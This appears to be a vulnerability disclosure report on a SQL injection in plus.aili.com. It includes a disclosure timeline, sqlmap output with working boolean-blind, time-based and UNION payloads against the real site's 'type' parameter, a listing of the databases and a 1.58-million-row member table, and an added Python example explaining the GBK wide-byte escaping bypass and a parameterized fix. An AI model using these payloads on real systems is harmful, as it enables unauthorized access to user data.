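2015-09-08: Details reported to the vendor; awaiting vendor handling
2015-09-08: Vendor confirmed; details disclosed to the vendor only
2015-09-18: Details disclosed to core white hats and experts in the relevant field
2015-09-28: Details disclosed to regular white hats
2015-10-08: Details disclosed to intern white hats
2015-10-23: Details disclosed to the public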
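I am Chuan Shen's only female apprentice, so please don't send me men's stuff.
When Chuan Shen was teaching me SQL injection, he said to practice on Aili first, since I might get a gift out of it too. So I took Chuan Shen's magic tool and clicked around, and then suddenly a result came out: http://plus.aili.com/topicLab/index.php?a=obllist&dosubmit=1&m=user&callback=jsonp1441610337285&r=0.27927674422971904&type=clothv3_index%df%27
I have only been learning for 3 days and still don't really understand what a request is, O(∩_∩)O~ let alone how to use sqlmap.
So Chuan Shen said to just copy this log over: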
web application technology: PHP 5.2.14
back-end DBMS: MySQL 5.0
available databases [3]:
[*] information_schema
[*] newcms
[*] test

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload: http://plus.aili.com:80/topicLab/index.php?a=obllist&dosubmit=1&m=user&callback=jsonp1441610337285&r=0.27927674422971904&type=clothv3_index%df' or 1=(SELECT (CASE WHEN (4055=4055) THEN 4055 ELSE 4055*(SELECT 4055 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))#

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: http://plus.aili.com:80/topicLab/index.php?a=obllist&dosubmit=1&m=user&callback=jsonp1441610337285&r=0.27927674422971904&type=clothv3_index%df' or 1=2 AND (SELECT * FROM (SELECT(SLEEP(5)))vuFe)#

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: http://plus.aili.com:80/topicLab/index.php?a=obllist&dosubmit=1&m=user&callback=jsonp1441610337285&r=0.27927674422971904&type=clothv3_index%df' or 1=2 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71706a6a71,0x7955714447467145586e,0x71786b6a71)-- #
---
Database: newcms
[742 tables]
Database: newcms
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| dzxbbs_ucenter_members | 1583148 |
+------------------------+---------+
How do I redact this? I don't know how to do fixes and such yet. Send me a face mask.
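Added example, not part of the original report: it shows why the `%df%27` suffix on the `type` parameter can survive backslash escaping, and how an allow-list plus a bound parameter handles the same value. It assumes the application escapes input addslashes-style and talks to MySQL over a GBK connection (inferred from the `%df` byte, not stated in the report); the function names, the `topic` table and the sqlite3 stand-in database are hypothetical.

```python
import re
import sqlite3
from urllib.parse import unquote_to_bytes

# `type` value exactly as it appears in the reported URL, decoded to raw bytes.
RAW = unquote_to_bytes("clothv3_index%df%27")

def addslashes(raw: bytes) -> bytes:
    """Byte-wise emulation of PHP addslashes() (assumed to be the filter in use)."""
    out = bytearray()
    for b in raw:
        if b == 0:
            out += b"\\0"
        elif b in b"'\"\\":
            out += b"\\" + bytes([b])
        else:
            out.append(b)
    return bytes(out)

def live_quotes(escaped: bytes, charset: str) -> int:
    """Count quotes that still end a string literal once the server decodes
    the escaped bytes with the given connection charset."""
    text = escaped.decode(charset, errors="replace")
    count, i = 0, 0
    while i < len(text):
        if text[i] == "\\":
            i += 2  # a backslash neutralises the character after it
            continue
        if text[i] == "'":
            count += 1
        i += 1
    return count

def valid_type(raw: bytes) -> bool:
    """Allow-list for `type` (hypothetical rule): ASCII letters, digits, underscore."""
    return re.fullmatch(rb"[A-Za-z0-9_]{1,64}", raw) is not None

def lookup(raw: bytes) -> int:
    """Bind the value as a query parameter; sqlite3 stands in for the real DBMS."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE topic (type TEXT)")  # hypothetical table
    db.execute("INSERT INTO topic VALUES ('clothv3_index')")
    value = raw.decode("gbk", errors="replace")
    (n,) = db.execute("SELECT COUNT(*) FROM topic WHERE type = ?", (value,)).fetchone()
    db.close()
    return n

if __name__ == "__main__":
    escaped = addslashes(RAW)
    print("escaped bytes:       ", escaped)
    print("live quotes, gbk:    ", live_quotes(escaped, "gbk"))
    print("live quotes, latin-1:", live_quotes(escaped, "latin-1"))
    print("allow-list accepts:  ", valid_type(RAW))
    print("rows via bound param:", lookup(RAW))
```

Under GBK the escaping backslash (0x5c) is absorbed as the trail byte of a two-byte character that starts with 0xdf, so the quote after it is left unescaped; in a single-byte charset the same escaped bytes contain no live quote.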
Severity: High
Vulnerability Rank: 18
Confirmation time: 2015-09-08 11:31
Patching the hole, on it...
None yet